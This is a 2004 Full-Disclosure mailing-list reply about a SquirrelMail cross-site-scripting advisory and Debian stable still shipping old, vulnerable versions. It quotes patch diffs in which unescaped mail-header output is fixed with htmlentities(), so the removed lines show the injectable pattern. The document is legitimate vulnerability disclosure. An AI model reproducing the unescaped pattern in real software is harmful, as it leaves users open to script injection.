Re: RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability

[Roman Medina <roman () rs-labs com>]

On Tue, 1 Jun 2004 23:13:32 +0200, you wrote:

> On Sunday, 2004-05-30 at 03:15:44 +0200, Roman Medina wrote:
>
> > I also noticed that latest Debian stable distro ships a very old
> > version of SquirrelMail, which is vulnerable to several old XSS bugs
> > (in addition to the new one).
>
> The latest Stable is itself quite old. Debian does not release very
> often. But security bugs are fixed when they become known. I have not
> found any bug report concerning XSS in the Debian bugs database. Please
> be so kind and file bugs if you are running Debian. If not, please mail
> the Debian Security Team as described in
>  http://www.de.debian.org/security/faq#contact

 The point here is that it is not easy or always possible to track any
error being corrected on every software. In other words, many
vendors/developers silently fixes bugs and they don't necesarily have
to know who is packaging their software and inform them. Mix this with
the (IMHO) too much conservative Debian's policy, beat well and you've
got it :-)

 I did not performed an exhaustive check. Simply I chose some of the
latest 2.x versions from changelog where it was listed the string
"XSS", I had the strong feeling that the bug would be still present in
Debian stable. And I guessed it :)

 The result is listed in my advisory. Quoting from it:

"  I chose between two beautiful bugs:

roman@rs-labs:~$ diff -ur squirrelmail-1.2.10/src/read_body.php
squirrelmail-1.2.11/src/read_body.php
@@ -976,7 +977,7 @@
                      "<TD BGCOLOR=\"$color[0]\" ALIGN=RIGHT
VALIGN=TOP>" .
                            _("Mailer") . ': '.
                      "</TD><TD BGCOLOR=\"$color[0]\" VALIGN=TOP
colspan=2>" .
- -                        "<B>$mailer</B>&nbsp;" .
+                        "<B>" . htmlentities($mailer) . "</B>&nbsp;"
.
                      '</TD>' .
                   "</TR>" . "\n";
  
roman@rs-labs:~$ diff -ur
squirrelmail-1.2.10/functions/mailbox_display.php
squirrelmail-1.2.11/functions/mailbox_display.php
 require_once('../functions/strings.php');
@@ -59,7 +59,7 @@
             if ($senderName != '') {
                 $senderName .= ', ';
             }
- -            $senderName .=
sqimap_find_displayable_name($senderNames_part);
+            $senderName .=
htmlentities(sqimap_find_displayable_name($senderNames_part));
         }
     }
"

 I repeat that I didn't test other versions (and I haven't more time
to spend on this). I've placed Debian security team email on CC but
you should know that I informed Sam (Debian maintainer for SM) of all
this issues. Indeed I've exchanged many mails with SM team / Sam (both
of them always being on CC / To). The final advisory also was sent to
Sam before the release. I supposed he would release new .deb packages.
I don't know what happened.

 Saludos,
 --Roman

--
PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html